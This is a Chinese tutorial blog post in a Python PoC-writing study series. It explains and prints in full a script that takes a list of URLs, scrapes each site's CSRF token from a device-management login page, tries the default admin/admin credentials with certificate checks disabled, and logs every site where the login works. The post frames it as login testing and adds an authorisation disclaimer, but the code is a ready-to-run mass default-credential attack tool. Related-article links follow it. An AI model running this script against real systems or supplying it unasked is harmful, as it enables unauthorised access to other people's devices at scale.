寒假学习第24天---PythonPoc基础编写(二)

提示:所分享内容仅用于每一个爱好者之间的技术讨论及教育目的,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本作者不承担相应的后果。

文章目录


前言

又来了哈,小六花祝你早日学习poc的编写,上一次的poc编写链接
链接


一、 目标

我们可以编写poc的脚本来验证一些简单的操作,今天我们来模拟登陆,如果登陆成功就写入一个文档里,方便我们后续的操作

二、过程

思路

我们想对一个网站进行登陆操作,肯定要获取它的服务器返回了什么东西,我们f12先抓个包,看请求了什么

有这些东西,username,password,logintype,csrfmiddlewaretoken,其中

csrfmiddlewaretoken,这个字段,每个网站都不一样,我们对每个网站都需要重新进行获取

服务器返回信息,这个解码就是对不起,你的用户名或密码错误,如果登陆成功 ret的字段会变成0,这样就简单了,我们直接让csrfmiddlewaretoken自动向网站获取,ret=0并且状态码为200(这里需要用json的编码)

实践开始

引用库

python 复制代码
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm  

requests:一个简单易用的HTTP库,用于发送HTTP请求。

BeautifulSoup:一个用于解析HTML和XML文档的库,可以从网页中提取数据。

tqdm:一个快速、可扩展的Python进度条库,可以在Python长循环中添加一个进度提示信息。

python 复制代码
# 初始化会话
session = requests.Session()

file_path = 'url.txt'
success_file_path = 'success_urls.txt'  # 成功登录信息将被记录到这个文件

urls = []  # 存储所有URL
with open(file_path, 'r') as file:
    for line in file:
        urls.append(line.strip())

将session初始化,创建一个Session实例。Session对象允许你跨请求保持某些参数,比如cookies,即在同一个Session实例发出的所有请求之间保持cookies。

定义urls列表,将文件写入列表中,方便计数,展示进度

line.strip()去除前后文空格以及换行符

python 复制代码
for url in tqdm(urls, desc="处理进度"):
    if not url.startswith("http"):
        url = "http://" + url

    login_url = url + "/accounts/login/?next=/iclock/imanager"  # 构造登录页面URL

desc="处理进度"设置了进度条的描述文字。

python 复制代码
# 尝试获取登录页面以及CSRF token
    try:
        response = session.get(login_url, verify=False)
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
    except Exception as e:
        print(f'无法从{login_url}获取CSRF token: {e}')
        continue

获取csrfmiddlewaretoken的值

python 复制代码
  # 准备请求头和数据
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
    }
    data = {
        "username": "admin",
        "password": "admin",
        "logintype": "user",
        "csrfmiddlewaretoken": csrf_token  # 使用动态获取的CSRF token
    }

请求头的构造

python 复制代码
   # 尝试登录
    try:
        response = session.post(login_url, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            if response.text:
                try:
                    response_data = response.json()
                    if response_data.get('ret') == 0:
                        print(f'URL: {url} - 登录成功: {response_data.get("message")}')
                        with open(success_file_path, 'a') as success_file:
                            success_file.write(
                                f'URL: {url}\n账号: {data["username"]}\n密码: {data["password"]}\n\n')
                    else:
                        print(f'URL: {url} - 登录失败: {response_data.get("message")}')
                except ValueError as e:
                    print(f'URL: {url} - 解析JSON失败: {e}')
            else:
                print(f'URL: {url} - 响应非JSON格式或为空')
        else:
            print(f'URL: {url} - 请求未成功,HTTP状态码: {response.status_code}')
    except Exception as e:
        print(f'URL: {url} - 请求失败: {e}')

使用POST方法,发送登录请求到登录页面。先检测网站是否能打开,再获取内容

根据响应状态码和响应内容判断登录是否成功。如果返回的是JSON格式且ret字段为0,则认为登录成功,并将成功的URL、用户名和密码写入success_urls.txt文件。

成功的话就写入success_urls.txt

总结

主要用于自动化测试网站的登录功能,特别是在有多个URL需要测试时,可以大大节省时间,不知不觉已经24天了,希望大家关注一下我,嘿嘿,六花祝你新年快乐

完整代码

python 复制代码
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm  # 导入tqdm

# 初始化会话
session = requests.Session()

file_path = 'url.txt'
success_file_path = 'success_urls.txt'  # 成功登录信息将被记录到这个文件

urls = []  # 存储所有URL
with open(file_path, 'r') as file:
    for line in file:
        urls.append(line.strip())

# 使用tqdm创建进度条
for url in tqdm(urls, desc="处理进度"):
    if not url.startswith("http"):
        url = "http://" + url

    login_url = url + "/accounts/login/?next=/iclock/imanager"  # 构造登录页面URL

    # 尝试获取登录页面以及CSRF token
    try:
        response = session.get(login_url, verify=False)
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
    except Exception as e:
        print(f'无法从{login_url}获取CSRF token: {e}')
        continue

    # 准备请求头和数据
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
    }
    data = {
        "username": "admin",
        "password": "admin",
        "logintype": "user",
        "csrfmiddlewaretoken": csrf_token  # 使用动态获取的CSRF token
    }

    # 尝试登录
    try:
        response = session.post(login_url, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            if response.text:
                try:
                    response_data = response.json()
                    if response_data.get('ret') == 0:
                        print(f'URL: {url} - 登录成功: {response_data.get("message")}')
                        with open(success_file_path, 'a') as success_file:
                            success_file.write(
                                f'URL: {url}\n账号: {data["username"]}\n密码: {data["password"]}\n\n')
                    else:
                        print(f'URL: {url} - 登录失败: {response_data.get("message")}')
                except ValueError as e:
                    print(f'URL: {url} - 解析JSON失败: {e}')
            else:
                print(f'URL: {url} - 响应非JSON格式或为空')
        else:
            print(f'URL: {url} - 请求未成功,HTTP状态码: {response.status_code}')
    except Exception as e:
        print(f'URL: {url} - 请求失败: {e}')
相关推荐
简佐义的博客2 分钟前
生信入门进阶指南:学习顶级实验室多组学整合方案,构建肾脏细胞空间分子图谱
人工智能·学习
白日做梦Q3 分钟前
Anchor-free检测器全解析:CenterNet vs FCOS
python·深度学习·神经网络·目标检测·机器学习
近津薪荼4 分钟前
dfs专题4——二叉树的深搜(验证二叉搜索树)
c++·学习·算法·深度优先
喵手17 分钟前
Python爬虫实战:公共自行车站点智能采集系统 - 从零构建生产级爬虫的完整实战(附CSV导出 + SQLite持久化存储)!
爬虫·python·爬虫实战·零基础python爬虫教学·采集公共自行车站点·公共自行车站点智能采集系统·采集公共自行车站点导出csv
喵手24 分钟前
Python爬虫实战:地图 POI + 行政区反查实战 - 商圈热力数据准备完整方案(附CSV导出 + SQLite持久化存储)!
爬虫·python·爬虫实战·零基础python爬虫教学·地区poi·行政区反查·商圈热力数据采集
熊猫_豆豆30 分钟前
YOLOP车道检测
人工智能·python·算法
rannn_11130 分钟前
【苍穹外卖|Day4】套餐页面开发(新增套餐、分页查询、删除套餐、修改套餐、起售停售)
java·spring boot·后端·学习
nimadan1231 分钟前
**热门短剧小说扫榜工具2025推荐,精准捕捉爆款趋势与流量
人工智能·python
默默前行的虫虫36 分钟前
MQTT.fx实际操作
python
张人玉1 小时前
VisionPro 定位与卡尺测量学习笔记
笔记·学习·计算机视觉·vsionprp